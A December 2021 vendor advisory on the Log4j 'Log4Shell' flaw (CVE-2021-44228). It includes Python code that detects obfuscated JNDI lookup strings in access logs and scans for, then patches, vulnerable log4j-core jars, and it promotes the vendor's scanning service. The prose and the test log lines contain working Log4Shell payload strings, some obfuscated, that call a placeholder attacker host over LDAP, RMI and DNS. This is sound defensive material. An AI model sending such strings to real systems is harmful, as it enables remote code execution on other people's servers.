Security Incident
15.Dec.2021

Avoid falling victim to the worst zero-day vulnerability in recent years: what Apache Log4j is, and how to patch CVE-2021-44228


What is Apache log4j

The Apache Software Foundation recently issued a critical vulnerability advisory for Log4j, a widely used open-source Java logging framework that many developers rely on to record activity in their applications. The remote code execution vulnerability, CVE-2021-44228, known as "Log4Shell", affects Log4j 2.x from 2.0-beta9 through 2.14.1. Version 2.15.0 (released 2021/12/10) turned out to be an incomplete fix, tracked separately as CVE-2021-45046; version 2.16.0 (released 2021/12/13) removes message lookups entirely and disables JNDI by default. The flaw lies in Log4j's message lookup feature: when an attacker-controlled string such as ${jndi:ldap://attacker.example/a} ends up in a log message (from an HTTP header, a username, a chat message or any other logged input), Log4j resolves the JNDI lookup, connects to the attacker's LDAP or RMI server, and can load and execute a class that server returns. An unauthenticated remote attacker can thereby execute arbitrary code and take control of the target system. The vulnerability carries the maximum score of 10.0 under the Common Vulnerability Scoring System (CVSS) v3.1. Because Log4j is embedded in countless commercial applications and services, including Minecraft, Elasticsearch and VMware vCenter, Log4Shell is arguably one of the worst vulnerabilities in recent history.
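The lookup string described above is what defenders hunt for in access logs and request headers, but attackers rarely send it verbatim: they hide it behind nested lookups (${lower:j}, ${::-j}, ${env:X:-j}) or URL-encoding. The following is an added example, not code from the original page or from Onward Security, showing detection logic that folds those obfuscations inside-out and then matches ${jndi:<scheme>:...}. The log lines in SAMPLE_LOG are constructed for the demonstration (attacker.example is a placeholder host), and the function names are this example's own.

```python
"""Detect Log4Shell (CVE-2021-44228) lookup strings in log lines or request fields.

Added example, not code from the original page.  It folds the obfuscations
commonly used to hide the payload (${lower:j}, ${::-j}, ${env:X:-j},
URL-encoding) and then looks for ${jndi:<scheme>:...}.  The log lines in
SAMPLE_LOG are constructed for the demonstration, not captured traffic.
"""
import re
from urllib.parse import unquote

# Innermost ${...} expression: its body contains no further ${...}.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# After folding, a payload reads ${jndi:ldap:...}, ${jndi:rmi:...}, ${jndi:dns:...} ...
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)


def _fold(match):
    """Replace one innermost lookup by the literal it evaluates to, if we can tell."""
    body = match.group(1)
    if ":-" in body:
        name, default = body.split(":-", 1)
        # ${whatever:-x} yields "x" when the lookup fails; a real jndi: lookup
        # would be attempted first, so leave those for the JNDI regex.
        if not name.strip().lower().startswith("jndi"):
            return default
        return match.group(0)
    if ":" in body:
        prefix, value = body.split(":", 1)
        prefix = prefix.strip().lower()
        if prefix == "lower":
            return value.lower()
        if prefix == "upper":
            return value.upper()
    return match.group(0)          # e.g. ${jndi:...} or ${env:HOME}: keep as-is


def normalize(text, max_rounds=20):
    """URL-decode once, then fold lookups inside-out until nothing changes."""
    text = unquote(text)
    for _ in range(max_rounds):
        folded = INNER_LOOKUP.sub(_fold, text)
        if folded == text:
            break
        text = folded
    return text


def find_jndi(line):
    """Return the JNDI scheme (ldap, rmi, dns, ...) if the line carries a lookup, else None."""
    m = JNDI.search(normalize(line))
    return m.group(1).lower() if m else None


# Constructed Apache-style access log lines (attacker.example is a placeholder).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://attacker.example:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:l}dap://attacker.example/x}"',
    '203.0.113.11 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://attacker.example/y}"',
    '203.0.113.13 - - [10/Dec/2021:12:00:05 +0000] '
    '"GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fattacker.example%2Fz%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.15 - - [10/Dec/2021:12:00:06 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${env:HOME} is not a JNDI lookup"',
]


def scan(lines):
    """(line number, scheme) for every line that carries a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        scheme = find_jndi(line)
        if scheme:
            hits.append((number, scheme))
    return hits


if __name__ == "__main__":
    for number, scheme in scan(SAMPLE_LOG):
        print("line %d: jndi lookup via %s -> %s" % (number, scheme, normalize(SAMPLE_LOG[number - 1])))
```

The normaliser handles the default-value and case-changing lookups seen in the wild; it is not a full Log4j interpolation engine, so treat a hit as confirmed and a miss as "not matched by these rules". Any line that carries ${ at all in attacker-supplied fields deserves a look, and a matched line should be followed by checking whether the target host actually made the outbound LDAP, RMI or DNS connection the lookup requests.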

Check for the Apache Log4j vulnerability with a verification service

If you are not certain whether your existing services or products are affected, Onward Security's HERMAS research team has reproduced the Log4Shell vulnerability and now offers a vulnerability verification service to customers. We can help determine whether your systems and products are affected.

Identify Apache log4j risks with SecSAM

With HERCULES SecSAM you can generate a Software Bill of Materials (SBOM) for your product and check whether it contains an affected Log4j component. SecSAM's automated firmware scanning can also confirm whether the affected component is present inside a firmware image.
(Figure: Identify potential risks in products through SecSAM)

Mitigation solutions

When a HERCULES SecSAM scan reports an affected version of Log4j, upgrade Log4j to 2.16.0 or later (2.12.2 if the product is still on Java 7). If an immediate upgrade is not possible, the Apache advisory's documented workaround is to remove the JndiLookup class from the log4j-core jar on the classpath. You can also refer to the following mitigation references compiled by SecSAM.
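The check that the SBOM and mitigation paragraphs above describe, as an added example in Python (not SecSAM's or Apache's own code): it walks a directory for log4j-core jars, reads the version from each jar's Maven pom.properties or manifest, classifies it against the affected ranges as published at the time of this page, and applies the workaround from the Apache advisory for deployments that cannot upgrade at once, rewriting the jar without JndiLookup.class. The jars produced by make_fake_core_jar are constructed stand-ins that contain only the entries the scanner inspects; function names such as scan_tree and classify are this example's own.

```python
"""Locate log4j-core jars on disk, read their version, and strip JndiLookup.class.

Added example (not SecSAM or Apache code).  The version ranges encode the
Apache advisory as of this page's date: 2.0-beta9..2.14.1 vulnerable,
2.15.0 an incomplete fix (CVE-2021-45046), 2.16.0 (and 2.12.2 on the
Java 7 line) fixed.  Removing JndiLookup.class is the workaround Apache
documents for builds that cannot be upgraded immediately.
"""
import os
import re
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
CORE_PREFIX = "org/apache/logging/log4j/core/"


def version_tuple(version):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0) (qualifier dropped)."""
    numeric = version.split("-", 1)[0]
    parts = [int(p) for p in re.findall(r"\d+", numeric)]
    return tuple((parts + [0, 0, 0])[:3])


def read_version(jar):
    """Version from Maven pom.properties, falling back to the manifest."""
    names = set(jar.namelist())
    if POM_PROPS in names:
        m = re.search(r"^version=(.+)$", jar.read(POM_PROPS).decode("utf-8", "replace"), re.M)
        if m:
            return m.group(1).strip()
    if "META-INF/MANIFEST.MF" in names:
        m = re.search(r"^Implementation-Version:\s*(.+)$",
                      jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace"), re.M)
        if m:
            return m.group(1).strip()
    return None


def classify(version, jndi_present):
    """Verdict for a log4j-core 2.x jar given its version and whether JndiLookup.class is inside."""
    if version is None:
        return "unknown"
    v = version_tuple(version)
    if v >= (2, 16, 0) or (2, 12, 2) <= v < (2, 13, 0):
        return "fixed"
    if v >= (2, 15, 0):
        return "partial-fix"          # 2.15.x: CVE-2021-45046 still open
    return "vulnerable" if jndi_present else "mitigated"


def assess(jar_path):
    """Return (version, JndiLookup present?, verdict) for one log4j-core jar."""
    with zipfile.ZipFile(jar_path) as jar:
        version = read_version(jar)
        jndi_present = JNDI_CLASS in jar.namelist()
    return version, jndi_present, classify(version, jndi_present)


def scan_tree(root):
    """Walk root for log4j-core jars and assess each (jars nested inside war/ear files are not opened)."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".jar"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with zipfile.ZipFile(path) as jar:
                    is_core = any(n.startswith(CORE_PREFIX) for n in jar.namelist())
            except zipfile.BadZipFile:
                continue
            if is_core:
                findings.append((path,) + assess(path))
    return findings


def strip_jndi_lookup(jar_path):
    """Rewrite the jar without JndiLookup.class; returns True if the class was removed."""
    with zipfile.ZipFile(jar_path) as src:
        if JNDI_CLASS not in src.namelist():
            return False
        fd, tmp = tempfile.mkstemp(suffix=".jar", dir=os.path.dirname(jar_path) or ".")
        os.close(fd)
        with zipfile.ZipFile(tmp, "w") as dst:
            for info in src.infolist():
                if info.filename != JNDI_CLASS:
                    dst.writestr(info, src.read(info.filename))
    os.replace(tmp, jar_path)       # atomic swap; keep a backup of the original in real use
    return True


def make_fake_core_jar(path, version, with_jndi=True):
    """Constructed stand-in for a log4j-core jar: only the entries the scanner inspects."""
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF",
                     "Manifest-Version: 1.0\r\nImplementation-Version: %s\r\n" % version)
        jar.writestr(POM_PROPS, "version=%s\nartifactId=log4j-core\n" % version)
        jar.writestr(CORE_PREFIX + "Core.class", b"\xca\xfe\xba\xbe")
        if with_jndi:
            jar.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")


def demo():
    """Build three constructed jars, scan, strip JndiLookup from the vulnerable one, rescan."""
    root = tempfile.mkdtemp()
    for version in ("2.14.1", "2.15.0", "2.16.0"):
        make_fake_core_jar(os.path.join(root, "log4j-core-%s.jar" % version), version)
    before = {os.path.basename(p): verdict for p, _, _, verdict in scan_tree(root)}
    for path, _, _, verdict in scan_tree(root):
        if verdict == "vulnerable":
            strip_jndi_lookup(path)
    after = {os.path.basename(p): verdict for p, _, _, verdict in scan_tree(root)}
    return before, after


if __name__ == "__main__":
    for verdicts in demo():
        print(verdicts)
```

Run scan_tree against a real installation directory to get one (path, version, JndiLookup present, verdict) row per log4j-core jar. A filesystem walk misses jars nested inside war or ear files and shaded copies of Log4j under a renamed package, which is exactly where a build-time SBOM is more reliable than scanning the deployed tree. Removing the class only disables the lookup that CVE-2021-44228 abuses; it is a stopgap, not an upgrade, so back up the jar first and still move to a fixed release.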


Vendor and third-party advisories (as listed by the National Vulnerability Database)
  • [oss-security] 20211210 Re: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints
  • https://logging.apache.org/log4j/2.x/security.html
  • https://security.netapp.com/advisory/ntap-20211210-0007/
Source: National Vulnerability Database
